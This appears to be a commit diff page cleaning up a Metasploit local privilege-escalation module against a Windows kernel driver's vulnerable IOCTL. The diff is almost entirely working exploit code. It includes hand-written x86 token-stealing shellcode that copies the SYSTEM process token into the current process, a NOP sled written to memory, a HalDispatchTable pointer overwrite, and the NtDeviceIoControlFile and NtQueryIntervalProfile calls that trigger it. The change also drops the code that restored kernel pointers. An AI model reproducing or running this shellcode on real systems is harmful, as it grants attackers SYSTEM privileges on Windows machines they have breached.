Clean up the mqac escalation module
parent
da4eb0e08f
commit
6a545c2642
|
@ -138,34 +138,30 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
halDispatchTable += kernel_info[0]
|
halDispatchTable += kernel_info[0]
|
||||||
print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
|
print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
|
||||||
|
|
||||||
halbase = find_sys_base("hal.dll")[0]
|
tokenstealing = "\x31\xc0"
|
||||||
haliQuerySystemInformation = halbase + mytarget['HaliQuerySystemInfo']
|
tokenstealing << "\x52"
|
||||||
halpSetSystemInformation = halbase + mytarget['HalpSetSystemInformation']
|
|
||||||
print_status("HaliQuerySystemInformation Address: 0x#{haliQuerySystemInformation.to_s(16)}")
|
|
||||||
print_status("HalpSetSystemInformation Address: 0x#{halpSetSystemInformation.to_s(16)}")
|
|
||||||
|
|
||||||
tokenstealing = "\x52"
|
|
||||||
tokenstealing << "\x53"
|
tokenstealing << "\x53"
|
||||||
tokenstealing << "\x33\xc0"
|
tokenstealing << "\x33\xc0"
|
||||||
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"
|
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"
|
||||||
tokenstealing << "\x8b\x40" + mytarget['_KPROCESS']
|
tokenstealing << "\x8b\x40" + target['_KPROCESS']
|
||||||
tokenstealing << "\x8b\xc8"
|
tokenstealing << "\x8b\xc8"
|
||||||
tokenstealing << "\x8b\x98" + mytarget['_TOKEN'] + "\x00\x00\x00"
|
tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"
|
||||||
tokenstealing << "\x89\x1d\x00\x09\x02\x00"
|
tokenstealing << "\x89\x1d\x00\x09\x02\x00"
|
||||||
tokenstealing << "\x8b\x80" + mytarget['_APLINKS'] + "\x00\x00\x00"
|
tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"
|
||||||
tokenstealing << "\x81\xe8" + mytarget['_APLINKS'] + "\x00\x00\x00"
|
tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"
|
||||||
tokenstealing << "\x81\xb8" + mytarget['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"
|
tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"
|
||||||
tokenstealing << "\x75\xe8"
|
tokenstealing << "\x75\xe8"
|
||||||
tokenstealing << "\x8b\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
|
tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"
|
||||||
tokenstealing << "\x8b\xc1"
|
tokenstealing << "\x8b\xc1"
|
||||||
tokenstealing << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
|
tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"
|
||||||
tokenstealing << "\x5b"
|
tokenstealing << "\x5b"
|
||||||
tokenstealing << "\x5a"
|
tokenstealing << "\x5a"
|
||||||
tokenstealing << "\xc2\x10"
|
tokenstealing << "\xc2\x10"
|
||||||
|
|
||||||
shellcode = make_nops(0x200) + restore_ptrs + tokenstealing
|
shellcode = make_nops(0x200) + tokenstealing
|
||||||
this_proc.memory.write(0x1, shellcode)
|
this_proc.memory.write(0x1, shellcode)
|
||||||
|
|
||||||
|
print_status("Triggering vulnerable IOCTL")
|
||||||
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
|
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
|
||||||
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
|
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue